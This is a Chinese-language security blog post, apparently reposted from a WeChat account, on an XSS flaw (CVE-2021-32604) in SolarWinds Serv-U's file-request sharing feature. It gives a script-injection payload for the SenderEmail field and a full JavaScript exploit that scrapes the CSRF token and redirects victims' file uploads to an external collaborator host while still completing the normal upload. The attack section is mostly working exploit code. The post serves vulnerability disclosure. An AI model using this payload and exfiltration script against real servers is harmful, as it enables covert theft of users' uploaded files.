Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

admin

102164
文章

87
评论

2021年11月17日03:54:04评论152 views1字数 2123阅读7分4秒阅读模式

点击上方蓝字关注我们

概述

研究人员在 SolarWinds Serv-U FTP 服务器中发现了一个有趣的漏洞。尽管初始向量需要身份验证，但低权限用户能够创建可公开访问的URL，当受害者访问该URL时将触发XSS有效载荷。

Serv-U包含两个功能来发送和接收来自其他用户的文件，在测试“请求文件”功能时，研究人员注意到发件人电子邮件输入被放置在可公开访问的共享URL中时没有被编码。这意味着攻击者可以向受害者发送一个共享URL来触发XSS漏洞。

漏洞复现

以下步骤是在Serv-U 15.2.3版本上测试的，通过身份验证后，用户可以转到“请求文件”选项卡以生成文件请求URL，如下图所示：

Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

使用虚拟数据并发送请求，会显示可公开访问的共享URL：

检查生成的URL会显示文件上传表单。在此处上传的文件将被发送回链接创建者的Serv-U文件夹。

Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

现在，如果我们修改原始链接生成请求，并在“SenderEmail”字段中包含一个XSS 有效载荷，例如"'/><script>alert(7)%3b</script>%40localhost.local。

Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

然后从响应中获取“ShareURL”。

Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

这样一来，就成功在可公开访问的共享URL上获得XSS了。

Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

漏洞利用

由于漏洞利用使用了Ajax异步调用，因此我们需要稍作调整才能将文件正确上传到 Serv-U同时发送出去。脚本可以简单地托管，然后使用<script>标签通过XSS注入。简而言之，具体步骤如下：

从页面抓取当前CSRF令牌
重写“SubmitForm”函数，改为发布到外部主机
调用Ajax方法将文件POST到原始Serv-U主机，以确保满足原始承诺

var csrftoken = $('script').text().match(/(&CsrfToken='+")(.*?)";/)[2];function SubmitForm(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual) {  var bSubmitted = false;  SubmitOriginal(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual);  if (rForm != null && rForm != undefined && rFormsTargetFrame != null && rFormsTargetFrame != undefined && sFileName != undefined && sFileName != null && sFileName != '' && nTransferID > 0) {    if (bIsVirtual == undefined || bIsVirtual == null)      bIsVirtual = 0;    var sAction = 'http://SOMEURL.burpcollaborator.net/Web Client/Share/MultipleFileUploadResult.htm?Command=UploadFileShare&TransferID=' + nTransferID + '&File=' + encodeURIComponent(sFileName) + '&ShareToken=' + g_sShareToken + '&IsVirtual=' + bIsVirtual + '&CsrfToken=' + csrftoken;    rForm.setAttribute('action', sAction);    rFormsTargetFrame.onload = null;    rFormsTargetFrame.src = '/Web Client/Share/MultipleFileUploadResetFrame.htm';    rForm.submit();    bSubmitted = true;  } else    ASSERT('Cannot submit form because function parameters are invalid.');  return bSubmitted;}
function SubmitOriginal(rForm, rFormsTargetFrame, sFileName, nTransferID, bIsVirtual) {  jQuery.ajax({      url: '/Web Client/Share/MultipleFileUploadResult.htm?Command=UploadFileShare&TransferID=' + nTransferID + '&File=' + encodeURIComponent(sFileName) + '&ShareToken=' + g_sShareToken + '&IsVirtual=' + bIsVirtual + '&CsrfToken=' + csrftoken,      data: new FormData(rForm),      cache: false,      contentType: false,      processData: false,      method: 'POST'  });}

END

Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

好文！必须在看

本文始发于微信公众号（SecTr安全团队）：Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

左青龙
微信扫一扫

右白虎
微信扫一扫

Solarwinds Serv-U中的XSS漏洞(CVE-2021-32604)

概述

漏洞复现

漏洞利用

CVE-2024-32409 POC

【Weblogic 文件上传漏洞（CVE-2019-2618）

Weblogic 任意文件读取漏洞（CVE-2019-2615)

用友U8 slbmbygr.jsp 存在sql注入

Couchdb垂直权限绕过(CVE-2017-12635)

Couchdb任意命令执行漏洞 (CVE-2017-12636)

CVE-2022-22947-spring-gateway RCE

Weblogic 反序列化漏洞（CVE-2019-2729）

JumpServer 任意文件读取漏洞（CVE-2023-42819）

用友GPR-U8 slbmbygr SQL注入漏洞

发表评论

在线咨询

微信